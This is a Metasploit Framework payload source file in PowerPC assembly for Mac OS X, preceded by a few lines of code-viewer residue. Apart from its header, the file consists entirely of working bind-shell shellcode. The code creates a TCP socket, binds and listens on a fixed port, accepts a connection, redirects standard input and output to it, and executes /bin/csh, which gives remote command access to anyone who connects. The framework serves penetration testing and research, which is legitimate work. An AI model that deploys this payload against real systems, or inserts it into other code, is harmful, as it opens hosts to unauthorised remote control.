100 lines
1.4 KiB
NASM
100 lines
1.4 KiB
NASM
;;
|
|
;
|
|
; Name: single_bind_tcp
|
|
; Qualities: Can Have Nulls
|
|
; Platforms: MacOS X / PPC
|
|
; Authors: H D Moore <hdm [at] metasploit.com>
|
|
; Version: $Revision: 1612 $
|
|
; License:
|
|
;
|
|
; This file is part of the Metasploit Exploit Framework
|
|
; and is subject to the same licenses and copyrights as
|
|
; the rest of this package.
|
|
;
|
|
; Description:
|
|
;
|
|
; Quick and dirty bind shell
|
|
;
|
|
;
|
|
;;
|
|
|
|
|
|
.globl _main
|
|
.globl _execsh
|
|
.text
|
|
|
|
_main:
|
|
|
|
_socket:
|
|
li r3, 2
|
|
li r4, 1
|
|
li r5, 6
|
|
li r0, 97
|
|
sc
|
|
xor r0, r0, r0
|
|
mr r30, r3
|
|
|
|
bl _bind
|
|
.long 0x00022312
|
|
.long 0x00000000
|
|
|
|
_bind:
|
|
mflr r4
|
|
li r5, 16
|
|
li r0, 104
|
|
mr r3, r30
|
|
sc
|
|
xor r0, r0, r0
|
|
|
|
_listen:
|
|
li r0, 106
|
|
mr r3, r30
|
|
sc
|
|
xor r0, r0, r0
|
|
|
|
_accept:
|
|
mr r3, r30
|
|
li r0, 30
|
|
li r4, 16
|
|
stw r4, -24(r1)
|
|
subi r5, r1, 24
|
|
subi r4, r1, 16
|
|
sc
|
|
xor r0, r0, r0
|
|
mr r30, r3
|
|
|
|
_setup_dup2:
|
|
li r5, 2
|
|
|
|
_dup2:
|
|
li r0, 90
|
|
mr r3, r30
|
|
mr r4, r5
|
|
sc
|
|
xor r0, r0, r0
|
|
subi r5, r5, 1
|
|
cmpwi r5, -1
|
|
bnel _dup2
|
|
|
|
_fork:
|
|
li r0, 2
|
|
sc
|
|
xor r5, r5, r5
|
|
|
|
_execsh:
|
|
;; based on ghandi's execve
|
|
xor. r5, r5, r5
|
|
bnel _execsh
|
|
mflr r3
|
|
addi r3, r3, 28 ; distance to path
|
|
stw r3, -8(r1) ; argv[0] = path
|
|
stw r5, -4(r1) ; argv[1] = NULL
|
|
subi r4, r1, 8 ; r4 = {path, 0}
|
|
li r0, 59
|
|
sc ; execve(path, argv, NULL)
|
|
|
|
; csh removes the need for setuid()
|
|
path:
|
|
.ascii "/bin/csh"
|
|
.long 0x00414243
|